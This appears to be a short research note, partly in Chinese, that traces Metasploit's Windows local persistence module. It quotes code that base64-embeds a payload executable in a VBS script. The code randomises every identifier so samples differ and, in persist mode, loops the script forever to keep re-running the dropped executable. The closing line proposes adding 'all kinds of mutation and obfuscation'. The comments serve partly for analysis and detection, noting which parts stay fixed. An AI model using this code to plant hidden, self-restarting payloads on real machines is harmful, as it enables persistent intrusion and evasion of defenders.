persist调用
/usr/local/share/metasploit-framework/modules/exploits/windows/local/persistence.rb
# Build the payload executable that the VBS wrapper will carry.
exe = generate_payload_exe

# Generate the VBS payload. :persist => true selects the looping form of the
# script in to_exe_vbs: the script body is re-run every `delay` seconds.
# rexe_name fixes the name of the dropped .exe instead of a random one.
vprint_status("Generating VBS persistent script (#{rvbs_name})")
vbs_options = { persist: true, delay: delay, exe_filename: rexe_name }
vbsscript = ::Msf::Util::EXE.to_exe_vbs(exe, vbs_options)
::Msf::Util::EXE.to_exe_vbs 来自 /usr/local/share/metasploit-framework/lib/msf/util/exe.rb
# self.to_exe_vbs
#
# Fills the substitution table for the "to_exe.vbs.template" script template
# and returns the result of read_replace_script_template. The executable is
# embedded as base64 text (:base64_shellcode).
#
# Every script identifier and the .b64 file name are random alphabetic strings
# of 8-15 characters (rand(8) + 8), chosen anew on each call. The .exe name is
# random as well unless :exe_filename is supplied. For anyone analysing the
# generated script this means variable and file names are not stable across
# samples; the fixed parts visible here are the "Do / WScript.Sleep / Loop"
# wrapper emitted in persist mode and whatever the template itself contains.
#
# @param exes [String] executable to embed; base64-encoded before substitution
# @param opts [Hash]
# @option opts [Integer] :delay seconds between runs in persist mode
#   (default 5); multiplied by 1000 for WScript.Sleep.
#   NOTE(review): earlier docs listed this as String, but a String would be
#   repeated 1000 times by `*` rather than scaled; confirm callers pass a number.
# @option opts [Boolean] :persist when truthy the script body is wrapped in an
#   endless Do ... Loop (default false). The key read is :persist, not :persists.
# @option opts [String] :exe_filename name for the dropped executable
def self.to_exe_vbs(exes = '', opts = {})
  delay = opts[:delay] || 5
  persist = opts[:persist] || false

  # One fresh random identifier per call site, 8 to 15 letters long.
  random_name = -> { Rex::Text.rand_text_alpha(rand(8) + 8) }

  # Key order is kept as in the original assignment sequence.
  hash_sub = {
    exe_filename: opts[:exe_filename] || (random_name.call << '.exe'),
    base64_filename: random_name.call << '.b64',
    var_shellcode: random_name.call,
    var_fname: random_name.call,
    var_func: random_name.call,
    var_obj: random_name.call,
    var_shell: random_name.call,
    var_tempdir: random_name.call,
    var_tempexe: random_name.call,
    var_basedir: random_name.call,
    base64_shellcode: Rex::Text.encode_base64(exes),
    var_decodefunc: random_name.call,
    var_xml: random_name.call,
    var_xmldoc: random_name.call,
    var_decoded: random_name.call,
    var_adodbstream: random_name.call,
    var_decodebase64: random_name.call
  }

  # :init is the script's entry stanza: a single call to the generated
  # function, or that call repeated forever with a sleep in between.
  hash_sub[:init] =
    if persist
      "Do\r\n" \
      "#{hash_sub[:var_func]}\r\n" \
      "WScript.Sleep #{delay * 1000}\r\n" \
      "Loop\r\n"
    else
      "#{hash_sub[:var_func]}\r\n"
    end

  read_replace_script_template("to_exe.vbs.template", hash_sub)
end
to_exe.vbs.template 来自 /usr/local/share/metasploit-framework/data/templates/scripts/to_exe.vbs.template
然后,各种变形混淆吧